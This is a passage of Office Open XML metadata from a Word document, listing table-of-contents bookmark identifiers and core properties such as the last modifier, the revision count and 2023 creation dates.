        <vt:i4>188</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102749</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031670</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>182</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102748</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048630</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>176</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102747</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114166</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>170</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102746</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179702</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>164</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102745</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245238</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>158</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102744</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>152</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102743</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376310</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>146</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102742</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441846</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>140</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102741</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>134</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102740</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102739</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031665</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>122</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102738</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102737</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114161</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102736</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179697</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102735</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245233</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102734</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102733</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376305</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102732</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441841</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102731</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507377</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102730</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102729</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031664</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102728</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048624</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102727</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114160</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102726</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179696</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102725</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245232</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102724</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310768</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102723</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376304</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102722</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441840</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102721</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507376</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102720</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102719</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc17102718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dxbinh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-05-29T07:01:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-12T09:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-12T09:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>